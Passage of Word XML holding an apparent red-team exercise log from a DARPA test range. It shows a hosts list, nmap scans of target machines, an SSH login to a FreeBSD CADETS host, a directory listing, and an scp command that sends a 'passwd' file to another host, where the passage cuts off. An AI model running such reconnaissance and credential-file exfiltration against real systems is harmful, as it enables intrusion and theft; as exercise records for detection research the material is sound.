    <w:p w14:paraId="136E23FC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.110   ta1-theia-target-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0367396A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.119   ta1-theia-target-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A125A32" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.111   ta1-theia-target-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D1AFCF8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.112   ta1-theia-analysis-dp   ta1-theia-nfs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F67708A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.77    ta52-windows-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E552BAF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.76    ta52-windows-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1479B257" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.51    ta1-cadets-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBB7E50" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.66    ta1-marple-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02E97A37" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.124   ta1-marple-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52023778" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.67    ta1-marple-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A16C5DF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.56    ta1-fivedirections-2-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B1CD3D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.109   ta1-fivedirections-3-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1B4CBD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>128.55.12.55    ta1-fivedirections-1-dp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="385BD59D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10.0.4.2        files.tc.bbn.com        devel.tc.bbn.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="361EB18A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="528DDC3D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:38</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2746F996" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-pivot-1:~$ sudo nmap 128.55.12.233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E1B8C5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="367A5022" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Starting Nmap 7.01 ( https://nmap.org ) at 2019-05-10 10:38 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D60F7C7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for 128.55.12.233</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0E5573" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (0.00030s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF0F38C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Not shown: 994 closed ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32BC0260" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT     STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71B3DF69" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp   open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8EA460" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>80/tcp   open  http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2744B9A3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>443/tcp  open  https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129275FD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>5901/tcp open  vnc-1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17C5213C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>6001/tcp open  X11:1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0098C8BA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>8000/tcp open  http-alt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00593774" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:B7 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B1133D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="193BF60C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap done: 1 IP address (1 host up) scanned in 1.46 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C5AE122" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="357BA6BA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:38</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B7EB16" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-pivot-1:~$ sudo nmap 128.55.12.51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C289B4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F2988A5" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Starting Nmap 7.01 ( https://nmap.org ) at 2019-05-10 10:38 EDT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376BFC02" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap scan report for ta1-cadets-1-dp (128.55.12.51)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AF98F1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Host is up (0.00044s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F8B2294" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Not shown: 997 closed ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37BA571E" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>PORT     STATE SERVICE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02ACDB17" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>22/tcp   open  ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5DB5E1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>80/tcp   open  http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72175F3D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>9100/tcp open  jetdirect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05ADAA97" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>MAC Address: 52:54:00:F0:08:01 (QEMU virtual NIC)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7276070B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F926EF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Nmap done: 1 IP address (1 host up) scanned in 50.82 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55577511" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1732E9A4" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:44</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1739F19A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-pivot-1:~$ date</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F65D31" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Fri May 10 10:44:33 EDT 2019</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A61D5C7" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>admin@ta51-pivot-1:~$ ssh admin@128.55.12.51</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3652F6E1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>The authenticity of host '128.55.12.51 (128.55.12.51)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D5E96F" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ECDSA key fingerprint is SHA256:BA0Sk+pB+Ewxd4B2RNKCvqlta/bKmrB3nqmkVfALvfw.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54691D0B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Are you sure you want to continue connecting (yes/no)? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8C010A" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Warning: Permanently added '128.55.12.51' (ECDSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1910D8DE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Password for admin@ta1-cadets-1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365C7645" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Last login: Fri May 10 14:41:59 2019 from 128.55.12.122</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="143202B2" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">FreeBSD 13.0-CURRENT 1c54f81b39(HEAD) CADETS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D9E2108" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16661CDB" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Welcome to FreeBSD!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="666DB514" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19C8B0F6" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Release Notes, Errata: https://www.FreeBSD.org/releases/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43398809" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Security Advisories:   https://www.FreeBSD.org/security/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1124A3BA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>FreeBSD Handbook:      https://www.FreeBSD.org/handbook/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A9E3F9" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>FreeBSD FAQ:           https://www.FreeBSD.org/faq/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219B9349" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="686E2A77" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>FreeBSD Forums:        https://forums.FreeBSD.org/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="655FF3FD" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D202C2B" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Documents installed with the system are in the /usr/local/share/doc/freebsd/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464B3FBE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>directory, or can be installed later with:  pkg install en-freebsd-doc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD938DC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>For other languages, replace "en" with a language code like de or fr.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B672BC8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="20078C06" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Show the version of FreeBSD installed:  freebsd-version ; uname -a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C937907" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Please include that output and any error messages when posting questions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2096D9E3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Introduction to manual pages:  man man</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="563192DC" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>FreeBSD directory layout:      man hier</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DBE101" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C53D075" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Edit /etc/motd to change this login announcement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36710454" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>Do you wonder what a terminal program is doing at the moment? dd(1) does not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28BFCCAE" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>show any throughput? Hit "^T" (Control + t) to send SIGINFO to the process</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="611BF199" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>and see what it is doing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081051E1" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7521C94D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">                -- Lars Engels &lt;lme@FreeBSD.org&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C348164" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75549AE3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:46</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C6F432" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[admin@ta1-cadets-1 ~]$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7092F435" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>backup                  files                   grains                  hsperfdata_darpa        minion                  out10                   out857                  out888                  test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AF917C" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>docs                    glx_alsa_675.ko         hosts                   jna-95354950            nodeexporter            out250                  out864                  passwd                  work</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A6D222D" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C51A46" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>10:48</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8DC811" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[admin@ta1-cadets-1 ~]$ getfile passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D412FCF" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>-bash: getfile: command not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D3E6F3" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>[admin@ta1-cadets-1 ~]$ scp passwd admin@128.55.12.149:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="344FCE72" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>The authenticity of host '128.55.12.149 (128.55.12.149)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AFC0E8" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r>
        <w:t>ECDSA key fingerprint is SHA256:d88CDDU3/VKCUWPWUfaKYqG/XSMWBkFhAHS1tLHJTig.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158867CA" w14:textId="77777777" w:rsidR="006C14C7" w:rsidRDefault="006C14C7" w:rsidP="006C14C7">
      <w:pPr>
        <w:pStyle w:val="Code"/>
